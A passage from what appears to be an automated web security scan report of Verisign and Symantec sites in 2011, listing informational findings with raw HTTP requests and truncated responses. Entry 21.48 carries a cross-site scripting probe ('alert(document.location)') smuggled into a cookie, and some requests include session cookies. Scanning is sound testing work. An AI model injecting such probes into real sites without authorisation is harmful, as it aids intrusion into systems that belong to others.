GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.22. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.26. https://knowledge.verisign.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/favicon.ico
Request
GET /favicon.ico HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "342ce-47e-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1150 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/plain ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
21.27. https://knowledge.verisign.com/support/code-signing-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.28. https://knowledge.verisign.com/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index.html
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.29. https://knowledge.verisign.com/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/digital-id-support/index.html
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.30. https://knowledge.verisign.com/support/eca-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/eca-support/index.html
Request
GET /support/eca-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index
Request
GET /support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 17000 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index.html
Request
GET /support/mpki-for-ssl-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.33. https://knowledge.verisign.com/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-support/index.html
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index.html
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/trust-seal-support/index.html
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.37. https://partnernet.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://partnernet.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: partnernet.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:06 GMT Server: Apache/2.2.15 (Unix) Last-Modified: Thu, 12 May 2011 19:48:14 GMT ETag: "70c638-47-4a3197842db80" Accept-Ranges: bytes Content-Length: 71 Connection: close Content-Type: text/html <meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">
21.38. https://policy3.responsys.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/
Request
GET / HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:00 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "2ef9310-155-486ed8d030880" Accept-Ranges: bytes Content-Length: 341 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Permission Policy</title> <meta http-equiv="Refresh" content="0; URL=./permission.htm" <meta http-equiv="Content-Ty...[SNIP]...
21.39. https://policy3.responsys.net/permission.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/permission.htm
Request
GET /permission.htm HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive Referer: https://policy3.responsys.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:00 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "2531311-130d-486ed8d030880" Accept-Ranges: bytes Content-Length: 4877 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Permission Policy</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head> <body b...[SNIP]...
21.40. https://policy3.responsys.net/privacy.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/privacy.htm
Request
GET /privacy.htm HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive Referer: https://policy3.responsys.net/permission.htm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:06 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "1f21312-1bfd-486ed8d030880" Accept-Ranges: bytes Content-Length: 7165 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Responsys Privacy Policy</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head>...[SNIP]...
21.41. https://press.verisign.com/easyir/customrel.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://press.verisign.com
Path:
/easyir/customrel.do
Request
GET /easyir/customrel.do HTTP/1.1 Host: press.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: Servlet/3.0; JBossAS-6 Content-Length: 1286 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- so that relative references will use absolute url from jsp and not from calling ...[SNIP]...
21.42. https://products.verisign.com/geocenter/reseller/doregister.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/doregister.do
Request
GET /geocenter/reseller/doregister.do?vatCountry= HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:19 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
21.43. https://products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.do
Request
POST /geocenter/reseller/logon.do HTTP/1.1 Host: products.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false Content-Length: 40 Cache-Control: max-age=0 Origin: https://knowledge.verisign.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765 userName=xss&password=xss&submit=Sign+In
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:02 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17164 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
21.44. https://products.verisign.com/geocenter/reseller/logon.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.jsp
Request
GET /geocenter/reseller/logon.jsp HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:15 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
21.45. https://products.verisign.com/geocenter/reseller/register.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/register.do
Request
GET /geocenter/reseller/register.do HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:16 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
21.46. https://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/search
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: sawsCache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]...
21.47. https://renewals.symantec.com/renewals/application
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/application
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
21.48. https://renewals.symantec.com/renewals/chat_form.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_form.jsp
Request
GET /renewals/chat_form.jsp HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:39:05 GMT Content-Type: text/html Content-Length: 15726 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- BEGIN IMPORT_INCLUDE--> <!--END IMPORT_INCLUDE--> <html> <head><ti...[SNIP]...
21.49. https://renewals.symantec.com/renewals/chat_norton.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_norton.jsp
Request
GET /renewals/chat_norton.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Length: 1638 Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN"> <head>...[SNIP]...
21.50. https://renewals.symantec.com/renewals/renewal_search.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/renewal_search.jsp
Request
GET /renewals/renewal_search.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/symantec_where_sn.jsp
Request
GET /renewals/symantec_where_sn.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Length: 10220 Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten...[SNIP]...
21.52. https://seal.verisign.com/getseal
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://seal.verisign.com
Path:
/getseal
Request
GET /getseal HTTP/1.1 Host: seal.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Cache-Control: max-age=0, must-revalidate ETag: Content-Type: text/javascript Date: Fri, 09 Sep 2011 21:46:24 GMT Connection: close <!-- x=1; -->
21.53. https://securitycenter.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
